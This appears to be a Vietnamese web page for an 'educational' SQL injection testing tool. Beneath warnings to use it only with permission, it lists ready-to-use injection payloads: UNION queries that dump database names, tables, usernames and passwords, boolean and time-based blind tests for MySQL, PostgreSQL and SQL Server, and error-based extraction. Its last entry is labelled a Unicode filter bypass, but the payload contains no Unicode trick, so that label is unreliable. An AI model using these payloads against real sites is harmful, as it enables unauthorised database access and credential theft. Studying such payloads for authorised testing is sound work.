Kiểm tra SQL Injection
Công cụ giáo dục để hiểu về lỗ hổng SQL Injection với payload tiếng Việt. Chỉ sử dụng trong môi trường test an toàn và có sự cho phép.
⚠️ Cảnh báo quan trọng
Công cụ này chỉ dành cho mục đích giáo dục và kiểm tra bảo mật hợp pháp. Không sử dụng để tấn công các hệ thống không có sự cho phép.
Cấu hình kiểm tra
Payload SQL Injection
Union Select - Cơ bản
Payload cơ bản để test union-based injection
' UNION SELECT 1,2,3--Union Select - Thông tin database
Lấy thông tin về database hiện tại
' UNION SELECT database(),user(),version()--Union Select - Liệt kê bảng
Liệt kê tất cả các bảng trong database
' UNION SELECT table_name,null,null FROM information_schema.tables--Boolean - Test cơ bản
Test boolean-based blind injection
' AND 1=1--Boolean - Test sai
Test với điều kiện sai để so sánh response
' AND 1=2--Boolean - Kiểm tra user
Kiểm tra user hiện tại có quyền admin
' AND (SELECT COUNT(*) FROM users WHERE role='admin')>0--Time-based - MySQL
Time-based blind injection cho MySQL
' AND (SELECT SLEEP(5))--Time-based - PostgreSQL
Time-based blind injection cho PostgreSQL
'; SELECT pg_sleep(5)--Time-based - SQL Server
Time-based blind injection cho SQL Server
'; WAITFOR DELAY '00:00:05'--Error-based - MySQL
Gây lỗi để lộ thông tin database
' AND (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY concat(version(),floor(rand()*2)))--Error-based - Double query
Sử dụng double query để lấy thông tin
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(database(),FLOOR(RAND()*2))x FROM information_schema.tables GROUP BY x)a)--Tìm kiếm tên Việt
Payload tìm kiếm với tên tiếng Việt
' OR name LIKE '%Nguyễn%' OR name LIKE '%Trần%'--Bypass với Unicode
Bypass filter sử dụng ký tự Unicode Việt
' UNION SELECT username,password FROM users--